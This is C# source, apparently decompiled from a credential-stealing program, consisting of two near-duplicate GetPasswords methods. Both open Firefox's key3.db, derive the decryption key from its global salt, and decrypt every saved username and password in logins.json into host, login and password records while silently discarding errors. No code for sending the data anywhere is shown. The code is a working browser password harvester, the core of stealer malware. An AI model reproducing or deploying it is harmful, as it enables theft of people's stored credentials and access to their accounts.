public List <BrowserLog> GetPasswords()
{
try
{
List <BrowserLog> browserLogList = new List <BrowserLog>();
DataTable dataTable = new DataTable();
Asn1Der asn1Der = new Asn1Der();
BerkeleyDB berkeleyDb = new BerkeleyDB(this.Key3Db);
PasswordCheck passwordCheck = new PasswordCheck(berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p => p.Key.Equals("password-check"))).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", string.Empty));
string hexString1 = berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p => p.Key.Equals("global-salt"))).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", string.Empty);
MozillaPBE mozillaPbe1 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString1), Encoding.ASCII.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
mozillaPbe1.Compute();
TripleDESHelper.DESCBCDecryptor(mozillaPbe1.Key, mozillaPbe1.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
string hexString2 = berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p =>
{
if (!p.Key.Equals("global-salt") && !p.Key.Equals("Version"))
{
return(!p.Key.Equals("password-check"));
}
return(false);
})).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", "");
Asn1DerObject asn1DerObject1 = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
MozillaPBE mozillaPbe2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString1), Encoding.ASCII.GetBytes(string.Empty), asn1DerObject1.objects[0].objects[0].objects[1].objects[0].Data);
mozillaPbe2.Compute();
byte[] dataToParse = TripleDESHelper.DESCBCDecryptorByte(mozillaPbe2.Key, mozillaPbe2.IV, asn1DerObject1.objects[0].objects[1].Data);
Asn1DerObject asn1DerObject2 = asn1Der.Parse(dataToParse);
Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
byte[] key = new byte[24];
if (asn1DerObject3.objects[0].objects[3].Data.Length > 24)
{
Array.Copy((Array)asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, (Array)key, 0, 24);
}
else
{
key = asn1DerObject3.objects[0].objects[3].Data;
}
foreach (Login login in File.ReadAllText(this.LoginJson).ParseJSON <RootObject>().logins)
{
Asn1DerObject asn1DerObject4 = asn1Der.Parse(Convert.FromBase64String(login.encryptedUsername));
Asn1DerObject asn1DerObject5 = asn1Der.Parse(Convert.FromBase64String(login.encryptedPassword));
string str1 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(key, asn1DerObject4.objects[0].objects[1].objects[1].Data, asn1DerObject4.objects[0].objects[2].Data), "[^\\u0020-\\u007F]", string.Empty);
string str2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(key, asn1DerObject5.objects[0].objects[1].objects[1].Data, asn1DerObject5.objects[0].objects[2].Data), "[^\\u0020-\\u007F]", string.Empty);
BrowserLog browserLog = new BrowserLog()
{
Host = string.IsNullOrWhiteSpace(login.hostname) ? "UNKOWN" : login.hostname,
Login = string.IsNullOrWhiteSpace(str1) ? "UNKOWN" : str1,
Password = string.IsNullOrWhiteSpace(str2) ? "UNKOWN" : str2
};
if (browserLog.Login != "UNKOWN" && browserLog.Password != "UNKOWN" && browserLog.Host != "UNKOWN")
{
browserLogList.Add(browserLog);
}
}
return(browserLogList);
}
catch
{
return(new List <BrowserLog>());
}
}
// Token: 0x06000168 RID: 360 RVA: 0x00007B94 File Offset: 0x00005D94
public List <Log> GetPasswords()
{
List <Log> result;
try
{
List <Log> list = new List <Log>();
DataTable dataTable = new DataTable();
Asn1Der asn1Der = new Asn1Der();
BerkeleyDB berkeleyDB = new BerkeleyDB(this.Key3Db);
PasswordCheck passwordCheck = new PasswordCheck((from p in berkeleyDB.Keys
where p.Key.Equals("password-check")
select p.Value).FirstOrDefault <string>().Replace("-", string.Empty));
string hexString = (from p in berkeleyDB.Keys
where p.Key.Equals("global-salt")
select p.Value).FirstOrDefault <string>().Replace("-", string.Empty);
MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.ASCII.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
mozillaPBE.Compute();
string text = TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
string hexString2 = (from p in berkeleyDB.Keys
where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check")
select p.Value).FirstOrDefault <string>().Replace("-", "");
Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
MozillaPBE mozillaPBE2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.ASCII.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data);
mozillaPBE2.Compute();
byte[] dataToParse = TripleDESHelper.DESCBCDecryptorByte(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data);
Asn1DerObject asn1DerObject2 = asn1Der.Parse(dataToParse);
Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
byte[] array = new byte[24];
bool flag = asn1DerObject3.objects[0].objects[3].Data.Length > 24;
if (flag)
{
Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24);
}
else
{
array = asn1DerObject3.objects[0].objects[3].Data;
}
RootObject rootObject = File.ReadAllText(this.LoginJson).ParseJSON <RootObject>();
foreach (Login login in rootObject.logins)
{
Asn1DerObject asn1DerObject4 = asn1Der.Parse(Convert.FromBase64String(login.encryptedUsername));
Asn1DerObject asn1DerObject5 = asn1Der.Parse(Convert.FromBase64String(login.encryptedPassword));
string text2 = TripleDESHelper.DESCBCDecryptor(array, asn1DerObject4.objects[0].objects[1].objects[1].Data, asn1DerObject4.objects[0].objects[2].Data);
text2 = Regex.Replace(text2, "[^\\u0020-\\u007F]", string.Empty);
string text3 = TripleDESHelper.DESCBCDecryptor(array, asn1DerObject5.objects[0].objects[1].objects[1].Data, asn1DerObject5.objects[0].objects[2].Data);
text3 = Regex.Replace(text3, "[^\\u0020-\\u007F]", string.Empty);
Log log = new Log
{
URL = (string.IsNullOrWhiteSpace(login.hostname) ? "UNKOWN" : login.hostname),
Login = (string.IsNullOrWhiteSpace(text2) ? "UNKOWN" : text2),
Password = (string.IsNullOrWhiteSpace(text3) ? "UNKOWN" : text3)
};
bool flag2 = log.Login != "UNKOWN" && log.Password != "UNKOWN" && log.URL != "UNKOWN";
if (flag2)
{
list.Add(log);
}
}
result = list;
}
catch
{
result = new List <Log>();
}
return(result);
}